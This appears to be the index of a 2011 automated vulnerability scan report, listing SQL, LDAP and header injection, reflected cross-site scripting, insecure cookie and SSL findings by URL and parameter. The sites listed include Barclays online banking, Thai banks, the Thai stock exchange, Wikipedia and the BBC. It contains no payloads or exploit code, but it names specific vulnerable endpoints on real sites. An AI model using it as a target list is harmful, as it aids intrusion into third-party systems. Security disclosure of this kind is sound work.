XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05032011-03

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 03 19:48:49 CDT 2011.

1. SQL injection

1.1. http://group.barclays.com/assets/script/webtrends-del.js [REST URL parameter 1]

1.2. http://group.barclays.com/html_phase_2/assets/css/styles.min.css [REST URL parameter 2]

1.3. http://group.barclays.com/html_phase_2/assets/scripts/scripts.min.js [REST URL parameter 2]

1.4. http://html.aggregateknowledge.com/iframe [itemid parameter]

1.5. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [JSESSIONID cookie]

1.6. http://moneytalk.scb.co.th/index.asp [Referer HTTP header]

1.7. http://moneytalk.scb.co.th/index.asp [name of an arbitrarily supplied request parameter]

1.8. http://register2.set.or.th/semreg/detail.aspx [cs parameter]

1.9. http://register2.set.or.th/semreg/detail.aspx [ow parameter]

1.10. http://register2.set.or.th/semreg/detail.aspx [sn parameter]

1.11. http://www.360travelguide.com/results.asp [User-Agent HTTP header]

1.12. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx [REST URL parameter 3]

1.13. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [REST URL parameter 4]

1.14. http://www.scriptlogic.com/ [Referer HTTP header]

1.15. http://www.set.or.th/set/images/bg-body.gif [jsessionid parameter]

2. LDAP injection

2.1. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do [WLBC cookie]

2.2. https://ibank.barclays.co.uk/olb/w/LoanOverview.do [WLBC cookie]

2.3. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do [WLBC cookie]

2.4. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do [WLBC cookie]

3. XPath injection

4. HTTP header injection

4.1. http://18.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

4.2. http://ad.uk.doubleclick.net/activity [REST URL parameter 1]

4.3. http://topics.nytimes.com/top/news/business/ [REST URL parameter 2]

4.4. http://topics.nytimes.com/top/news/business/ [REST URL parameter 3]

5. Cross-site scripting (reflected)

5.1. http://api.bing.com/qsonhs.aspx [q parameter]

5.2. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]

5.3. http://bits.wikimedia.org/en.wikipedia.org/load.php [REST URL parameter 2]

5.4. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]

5.5. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand [REST URL parameter 2]

5.6. http://ds.addthis.com/red/psi/sites/marketdata.set.or.th/p.json [callback parameter]

5.7. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json [callback parameter]

5.8. http://edge.aperture.displaymarketplace.com/displayscript.js [PageID parameter]

5.9. http://en.wikipedia.org/w/index.php [REST URL parameter 1]

5.10. http://en.wikipedia.org/w/index.php [REST URL parameter 2]

5.11. http://en.wikipedia.org/w/index.php [REST URL parameter 2]

5.12. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]

5.13. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand [REST URL parameter 2]

5.14. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 1]

5.15. http://hits.truehits.in.th/data/a0000000.js [REST URL parameter 2]

5.16. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 1]

5.17. http://hits.truehits.in.th/data/c0002215.js [REST URL parameter 2]

5.18. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 1]

5.19. http://hits.truehits.in.th/data/f0010172.js [REST URL parameter 2]

5.20. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 1]

5.21. http://hits.truehits.in.th/data/k0019767.js [REST URL parameter 2]

5.22. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 1]

5.23. http://hits.truehits.in.th/data/q0027704.js [REST URL parameter 2]

5.24. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 1]

5.25. http://hits.truehits.in.th/data/s0028564.js [REST URL parameter 2]

5.26. http://html.aggregateknowledge.com/iframe [pid parameter]

5.27. http://marketdata.set.or.th/mkt/topten.do [country parameter]

5.28. http://marketdata.set.or.th/mkt/topten.do [language parameter]

5.29. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]

5.30. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]

5.31. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]

5.32. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]

5.33. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]

5.34. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]

5.35. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]

5.36. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]

5.37. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]

5.38. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]

5.39. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]

5.40. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]

5.41. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]

5.42. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]

5.43. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [lang parameter]

5.44. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [name of an arbitrarily supplied request parameter]

5.45. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 1]

5.46. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 2]

5.47. http://trends.atipat.co.cc/thailand-breast-slap/x22 [name of an arbitrarily supplied request parameter]

5.48. http://widgets.digg.com/buttons/count [url parameter]

5.49. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 1]

5.50. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 2]

5.51. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [name of an arbitrarily supplied request parameter]

5.52. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]

5.53. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]

5.54. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]

5.55. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]

5.56. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]

5.57. http://wikimediafoundation.org/wiki/Terms_of_Use [REST URL parameter 2]

5.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp [pagename parameter]

5.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]

5.60. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 2]

5.61. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]

5.62. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 3]

5.63. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]

5.64. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 4]

5.65. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 5]

5.66. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]

5.67. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp [REST URL parameter 6]

5.68. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]

5.69. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 2]

5.70. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]

5.71. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 3]

5.72. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 4]

5.73. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]

5.74. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp [REST URL parameter 5]

5.75. http://www.bangkokpost.com/forum/viewtopic.php [name of an arbitrarily supplied request parameter]

5.76. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

5.77. http://www.ktam.co.th/en/alliance.php [name of an arbitrarily supplied request parameter]

5.78. http://www.ktam.co.th/en/index.php [name of an arbitrarily supplied request parameter]

5.79. http://www.ktam.co.th/en/index.php/a [REST URL parameter 3]

5.80. http://www.ktam.co.th/en/index.php/declarationnav.php [REST URL parameter 3]

5.81. http://www.ktam.co.th/en/index.php/declarationnav.php [name of an arbitrarily supplied request parameter]

5.82. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif [REST URL parameter 4]

5.83. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif [REST URL parameter 4]

5.84. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif [REST URL parameter 4]

5.85. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif [REST URL parameter 4]

5.86. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif [REST URL parameter 4]

5.87. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif [REST URL parameter 4]

5.88. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif [REST URL parameter 4]

5.89. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif [REST URL parameter 4]

5.90. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif [REST URL parameter 4]

5.91. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif [REST URL parameter 4]

5.92. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif [REST URL parameter 4]

5.93. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif [REST URL parameter 4]

5.94. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif [REST URL parameter 4]

5.95. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif [REST URL parameter 4]

5.96. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif [REST URL parameter 4]

5.97. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif [REST URL parameter 4]

5.98. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif [REST URL parameter 4]

5.99. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif [REST URL parameter 4]

5.100. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif [REST URL parameter 4]

5.101. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif [REST URL parameter 4]

5.102. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif [REST URL parameter 4]

5.103. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif [REST URL parameter 4]

5.104. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif [REST URL parameter 4]

5.105. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif [REST URL parameter 4]

5.106. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif [REST URL parameter 4]

5.107. http://www.ktam.co.th/en/index.php/ims/empty.gif [REST URL parameter 4]

5.108. http://www.ktam.co.th/en/index.php/ims/h_download1.gif [REST URL parameter 4]

5.109. http://www.ktam.co.th/en/index.php/ims/h_link1.gif [REST URL parameter 4]

5.110. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif [REST URL parameter 4]

5.111. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif [REST URL parameter 4]

5.112. http://www.ktam.co.th/en/index.php/ims/i_flash.gif [REST URL parameter 4]

5.113. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif [REST URL parameter 4]

5.114. http://www.ktam.co.th/en/index.php/ims/mails.png [REST URL parameter 4]

5.115. http://www.ktam.co.th/en/index.php/ims/news.php [REST URL parameter 4]

5.116. http://www.ktam.co.th/en/index.php/ims/news.php [name of an arbitrarily supplied request parameter]

5.117. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif [REST URL parameter 4]

5.118. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif [REST URL parameter 4]

5.119. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif [REST URL parameter 4]

5.120. http://www.ktam.co.th/en/index.php/ims/p_line001.gif [REST URL parameter 4]

5.121. http://www.ktam.co.th/en/index.php/ims/p_line002.gif [REST URL parameter 4]

5.122. http://www.ktam.co.th/en/index.php/ims/p_link01.gif [REST URL parameter 4]

5.123. http://www.ktam.co.th/en/index.php/ims/p_link02.gif [REST URL parameter 4]

5.124. http://www.ktam.co.th/en/index.php/ims/p_link03.gif [REST URL parameter 4]

5.125. http://www.ktam.co.th/en/index.php/ims/p_link04.gif [REST URL parameter 4]

5.126. http://www.ktam.co.th/en/index.php/ims/p_link05.gif [REST URL parameter 4]

5.127. http://www.ktam.co.th/en/index.php/ims/p_link06.gif [REST URL parameter 4]

5.128. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif [REST URL parameter 4]

5.129. http://www.ktam.co.th/en/index.php/ims/p_word1.gif [REST URL parameter 4]

5.130. http://www.ktam.co.th/en/index.php/media_box.php [REST URL parameter 3]

5.131. http://www.ktam.co.th/en/index.php/media_box.php [name of an arbitrarily supplied request parameter]

5.132. http://www.ktam.co.th/en/index.php/news.inc.php [REST URL parameter 3]

5.133. http://www.ktam.co.th/en/index.php/news.inc.php [name of an arbitrarily supplied request parameter]

5.134. http://www.ktam.co.th/en/index.php/news.php [REST URL parameter 3]

5.135. http://www.ktam.co.th/en/index.php/news.php [name of an arbitrarily supplied request parameter]

5.136. http://www.ktam.co.th/en/index.php/self_discovery.php [REST URL parameter 3]

5.137. http://www.ktam.co.th/en/index.php/self_discovery.php [name of an arbitrarily supplied request parameter]

5.138. http://www.ktam.co.th/en/index.php/style/news.php [REST URL parameter 4]

5.139. http://www.ktam.co.th/en/index.php/style/news.php [name of an arbitrarily supplied request parameter]

5.140. http://www.ktam.co.th/en/index.php/style/page.txt [REST URL parameter 4]

5.141. http://www.scb.co.th/en/home [REST URL parameter 1]

5.142. http://www.scb.co.th/en/home [REST URL parameter 2]

5.143. http://www.scb.co.th/en/home/ [REST URL parameter 1]

5.144. http://www.scb.co.th/en/home/ [REST URL parameter 2]

5.145. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 1]

5.146. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 2]

5.147. http://www.scb.co.th/en/home/favicon.ico [REST URL parameter 3]

5.148. http://www.scb.co.th/en/home/favicon.ico [name of an arbitrarily supplied request parameter]

5.149. http://www.scb.co.th/favicon.ico [REST URL parameter 1]

5.150. http://www.scb.co.th/landing.html [REST URL parameter 1]

5.151. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]

5.152. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]

5.153. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]

5.154. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 1]

5.155. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 2]

5.156. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 3]

5.157. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]

5.158. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]

5.159. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [Referer HTTP header]

5.160. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [Referer HTTP header]

5.161. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [Referer HTTP header]

5.162. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [Referer HTTP header]

5.163. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [Referer HTTP header]

5.164. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [Referer HTTP header]

5.165. http://scb.dev-orisma.com/en/friends-of-scb [User-Agent HTTP header]

5.166. http://www.scb.co.th/en/home [User-Agent HTTP header]

5.167. http://www.scb.co.th/en/home/ [User-Agent HTTP header]

5.168. http://dl.scriptlogic.com/download/default.aspx [EntryPoint cookie]

5.169. http://dl.scriptlogic.com/login/Combined.aspx [EntryPoint cookie]

5.170. http://dl.scriptlogic.com/login/CombinedRegister.aspx [EntryPoint cookie]

5.171. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.172. http://www.scriptlogic.com/downloadmanager/default.aspx [focus parameter]

6. Flash cross-domain policy

6.1. http://18.xg4ken.com/crossdomain.xml

6.2. http://a.unanimis.co.uk/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ad.uk.doubleclick.net/crossdomain.xml

6.5. http://adfarm.mediaplex.com/crossdomain.xml

6.6. http://aperture.displaymarketplace.com/crossdomain.xml

6.7. http://b.scorecardresearch.com/crossdomain.xml

6.8. http://cspix.media6degrees.com/crossdomain.xml

6.9. http://dis.us.criteo.com/crossdomain.xml

6.10. http://edge.aperture.displaymarketplace.com/crossdomain.xml

6.11. http://g.msn.com/crossdomain.xml

6.12. http://in.getclicky.com/crossdomain.xml

6.13. http://metrics.seenon.com/crossdomain.xml

6.14. http://now.eloqua.com/crossdomain.xml

6.15. http://pixel.33across.com/crossdomain.xml

6.16. http://scriptlogiccorp.d2.sc.omtrdc.net/crossdomain.xml

6.17. http://statse.webtrendslive.com/crossdomain.xml

6.18. http://tc.barclays.co.uk/crossdomain.xml

6.19. http://www.1day1year.com/crossdomain.xml

6.20. http://www.bangkokpost.com/crossdomain.xml

6.21. http://www.newsroom.barclays.com/crossdomain.xml

6.22. https://adwords.google.com/crossdomain.xml

6.23. http://answers.yahoo.com/crossdomain.xml

6.24. http://api.bing.com/crossdomain.xml

6.25. http://apps.barclays.co.uk/crossdomain.xml

6.26. https://apps.barclays.co.uk/crossdomain.xml

6.27. http://edge.sharethis.com/crossdomain.xml

6.28. http://feeds.bbci.co.uk/crossdomain.xml

6.29. http://googleads.g.doubleclick.net/crossdomain.xml

6.30. http://ktbcare.hi5.com/crossdomain.xml

6.31. http://news.bbc.co.uk/crossdomain.xml

6.32. http://newsrss.bbc.co.uk/crossdomain.xml

6.33. http://online.wsj.com/crossdomain.xml

6.34. http://pagead2.googlesyndication.com/crossdomain.xml

6.35. http://picasaweb.google.com/crossdomain.xml

6.36. http://topics.nytimes.com/crossdomain.xml

6.37. http://video.google.com/crossdomain.xml

6.38. http://w.sharethis.com/crossdomain.xml

6.39. http://www.adobe.com/crossdomain.xml

6.40. http://www.barclays.co.uk/crossdomain.xml

6.41. http://www.facebook.com/crossdomain.xml

6.42. http://www.independent.co.uk/crossdomain.xml

6.43. http://www.nbcuniversalstore.com/crossdomain.xml

6.44. http://www.youtube.com/crossdomain.xml

6.45. http://admin7.testandtarget.omniture.com/crossdomain.xml

6.46. http://advertising.microsoft.com/crossdomain.xml

6.47. http://docs.google.com/crossdomain.xml

6.48. http://twitter.com/crossdomain.xml

6.49. http://v13.lscache4.googlevideo.com/crossdomain.xml

6.50. http://weblink.settrade.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://g.msn.com/clientaccesspolicy.xml

7.5. http://metrics.seenon.com/clientaccesspolicy.xml

7.6. http://pixel.33across.com/clientaccesspolicy.xml

7.7. http://scriptlogiccorp.d2.sc.omtrdc.net/clientaccesspolicy.xml

7.8. http://api.bing.com/clientaccesspolicy.xml

7.9. http://onlinehelp.microsoft.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://dl.scriptlogic.com/login/Combined.aspx

8.2. http://home.controlcase.com/piwik/

8.3. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

8.4. http://truehits.net/

8.5. http://truehits.net/stat.php

8.6. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

8.7. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

8.8. http://wikipediareview.com/index.php

8.9. http://www.controlcase.com/change_password.php

8.10. http://www.controlcase.com/logon_page.php

8.11. http://www.khonkaen.com/english/forum/default.asp

8.12. http://www.newsroom.barclays.com/webuser/newsextra.aspx

8.13. http://www.newsroom.barclays.com/webuser/register.aspx

8.14. http://www.thailandhotelforums.com/forum/index.php

8.15. http://www.thailandhotelforums.com/forum/index.php

8.16. http://www.yestheyrefake.net/vb/forumdisplay.php

8.17. http://www.yestheyrefake.net/vb/showthread.php

9. XML injection

9.1. http://get.adobe.com/flashplayer/ [REST URL parameter 1]

9.2. http://home.controlcase.com/piwik/ [REST URL parameter 1]

9.3. http://home.controlcase.com/piwik/piwik.js [REST URL parameter 1]

9.4. http://home.controlcase.com/piwik/piwik.js [REST URL parameter 2]

9.5. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 1]

9.6. http://home.controlcase.com/piwik/piwik.php [REST URL parameter 2]

9.7. https://home.controlcase.com/piwik/ [REST URL parameter 1]

9.8. http://lvs.truehits.in.th/func/th_common_1.4.js [REST URL parameter 1]

9.9. http://lvs.truehits.in.th/func/th_common_1.4.js [REST URL parameter 2]

9.10. http://lvs.truehits.in.th/func/th_donate_1.8.js [REST URL parameter 1]

9.11. http://lvs.truehits.in.th/func/th_donate_1.8.js [REST URL parameter 2]

9.12. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en [REST URL parameter 1]

9.13. http://translatewiki.net/wiki/MediaWiki:Collapsible-expand/en [REST URL parameter 1]

9.14. http://www.controlcase.com/favicon.ico [REST URL parameter 1]

10. SQL statement in request parameter

11. SSL cookie without secure flag set

11.1. https://bizibanking.bangkokbank.com/bblamsui/SignOn.aspx

11.2. https://icustody.bangkokbank.com/Signon.aspx

11.3. https://ifunds.bangkokbank.com/Login.aspx

11.4. https://kcustodian.kasikornbank.com/KCustodian/

11.5. https://letmechoose.barclays.co.uk/

11.6. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

11.7. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

11.8. https://www.barclaysfantasyfundmanager.co.uk/

11.9. https://www.bizpayment.ktb.co.th/epayview/

11.10. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

11.11. https://www.ktb.co.th/internetservice/onlineAccountAction.do

11.12. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

11.13. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

11.14. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

11.15. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

11.16. https://adwords.google.com/um/StartNewLogin

11.17. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp

11.18. https://ebank.kasikornbankgroup.com/kbiznet/login.html

11.19. https://feedback.live.com/default.aspx

11.20. https://ibank.barclays.co.uk/

11.21. https://www.bizpayment.ktb.co.th/epayview

11.22. https://www.newcb.ktb.co.th/

11.23. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

12. Session token in URL

12.1. http://l.sharethis.com/pview

12.2. http://marketdata.set.or.th/mkt/images/bg-body.gif

12.3. http://marketdata.set.or.th/mkt/images/button-orange.gif

12.4. http://marketdata.set.or.th/mkt/images/email-setcallcenter.gif

12.5. http://marketdata.set.or.th/mkt/images/icon-go.gif

12.6. http://marketdata.set.or.th/mkt/images/icon-print-en01.gif

12.7. http://marketdata.set.or.th/mkt/images/icon-thai01.gif

12.8. http://marketdata.set.or.th/mkt/images/leftbox-top.gif

12.9. http://marketdata.set.or.th/mkt/images/middlebox-bgtop.gif

12.10. http://marketdata.set.or.th/mkt/images/middlebox-bottom-bg.gif

12.11. http://marketdata.set.or.th/mkt/images/middlebox-bottomleft.gif

12.12. http://marketdata.set.or.th/mkt/images/middlebox-bottomright.gif

12.13. http://marketdata.set.or.th/mkt/images/middlebox-topleft.gif

12.14. http://marketdata.set.or.th/mkt/images/middlebox-topright.gif

12.15. http://marketdata.set.or.th/mkt/images/rightbox-top.gif

12.16. http://marketdata.set.or.th/mkt/images/rss.gif

12.17. http://marketdata.set.or.th/mkt/images/spacer.gif

12.18. http://marketdata.set.or.th/mkt/images/tab-blue-bg.gif

12.19. http://marketdata.set.or.th/mkt/images/tab-blue-left.gif

12.20. http://marketdata.set.or.th/mkt/images/tab-blue-right.gif

12.21. http://marketdata.set.or.th/mkt/images/tab-grey-bg.gif

12.22. http://marketdata.set.or.th/mkt/images/tab-grey-left.gif

12.23. http://marketdata.set.or.th/mkt/images/tab-grey-right.gif

12.24. http://marketdata.set.or.th/mkt/javascripts/javascript.js

12.25. http://marketdata.set.or.th/mkt/styles/setstyle.css

12.26. http://marketdata.set.or.th/mkt/topten.do

12.27. http://marketdata.set.or.th/static/market/set/indextab_en_US.html

12.28. http://www.facebook.com/extern/login_status.php

12.29. http://www.set.or.th/highlight/release_en_US.html

12.30. http://www.set.or.th/set/images/bg-body.gif

12.31. http://www.set.or.th/set/images/button-orange.gif

12.32. http://www.set.or.th/set/images/email-setcallcenter.gif

12.33. http://www.set.or.th/set/images/icon-Avi.gif

12.34. http://www.set.or.th/set/images/icon-print-en01.gif

12.35. http://www.set.or.th/set/images/icon-thai01.gif

12.36. http://www.set.or.th/set/images/leftbox-top.gif

12.37. http://www.set.or.th/set/images/middlebox-bgtop.gif

12.38. http://www.set.or.th/set/images/middlebox-bottom-bg.gif

12.39. http://www.set.or.th/set/images/middlebox-bottomleft.gif

12.40. http://www.set.or.th/set/images/middlebox-bottomright.gif

12.41. http://www.set.or.th/set/images/middlebox-topleft.gif

12.42. http://www.set.or.th/set/images/middlebox-topright.gif

12.43. http://www.set.or.th/set/images/rightbox-top.gif

12.44. http://www.set.or.th/set/images/rss.gif

12.45. http://www.set.or.th/set/images/spacer.gif

12.46. http://www.set.or.th/set/javascripts/javascript.js

12.47. http://www.set.or.th/set/oppdaybyperiod.do

12.48. http://www.set.or.th/set/styles/setstyle.css

12.49. http://www.set.or.th/static/news/latestnews_en_US.html

12.50. http://www.set.or.th/static/news/latestnews_th_TH.html

12.51. http://www.thailandhotelforums.com/forum/index.php

13. SSL certificate

13.1. https://eprocurement.ktb.co.th/

13.2. https://feedback.live.com/

13.3. https://home.controlcase.com/

13.4. https://adwords.google.com/

13.5. https://apps.barclays.co.uk/

13.6. https://center.ktam.co.th/

13.7. https://csc.scb.co.th/

13.8. https://ebank.kasikornbankgroup.com/

13.9. https://ibank.barclays.co.uk/

13.10. https://ibanking.bangkokbank.com/

13.11. https://ipay.bangkokbank.com/

13.12. https://k-invest.kasikornbankgroup.com/

13.13. https://kcustodian.kasikornbank.com/

13.14. https://ksupplychain.kasikornbank.com/

13.15. https://ktradeconnect.kasikornbank.com/

13.16. https://letmechoose.barclays.co.uk/

13.17. https://online.kasikornbankgroup.com/

13.18. https://secure.wikimedia.org/

13.19. https://ws10.kasikornbank.com/

13.20. https://www.barclays-home-insurance.co.uk/

13.21. https://www.barclaysfantasyfundmanager.co.uk/

13.22. https://www.bizpayment.ktb.co.th/

13.23. https://www.google.com/

13.24. https://www.ktamsmarttrade.com/

13.25. https://www.ktb.co.th/

13.26. https://www.ktbonline.ktb.co.th/

13.27. https://www.newcb.ktb.co.th/

13.28. https://www.scb-fx.com/

13.29. https://www.scbbusinessnet.com/

13.30. https://www.scbeasy.com/

14. Open redirection

15. Cookie scoped to parent domain

15.1. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

15.2. http://www.thailandhotelforums.com/forum/index.php

15.3. http://0.r.msn.com/

15.4. http://18.xg4ken.com/media/redir.php

15.5. http://318395.r.msn.com/

15.6. http://914188.r.msn.com/

15.7. http://a.unanimis.co.uk/fc.php

15.8. https://adwords.google.com/select/Login

15.9. https://adwords.google.com/um/StartNewLogin

15.10. http://answers.yahoo.com/dir/index

15.11. http://answers.yahoo.com/question/index

15.12. http://b.scorecardresearch.com/b

15.13. http://cspix.media6degrees.com/orbserv/hbpix

15.14. http://dis.us.criteo.com/dis/dis.aspx

15.15. http://ds.addthis.com/red/psi/sites/www.set.or.th/p.json

15.16. http://edge.aperture.displaymarketplace.com/displayscript.js

15.17. http://get.adobe.com/flashplayer/

15.18. http://html.aggregateknowledge.com/iframe

15.19. http://id.google.com/verify/EAAAACvp35bQYF1JBTLact6hVgw.gif

15.20. http://id.google.com/verify/EAAAAGtz_EH3k7Yc1hyVHgvxIEg.gif

15.21. http://leadback.advertising.com/adcedge/lb

15.22. http://m1645.ic-live.com/515/

15.23. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

15.24. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

15.25. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm

15.26. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

15.27. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm

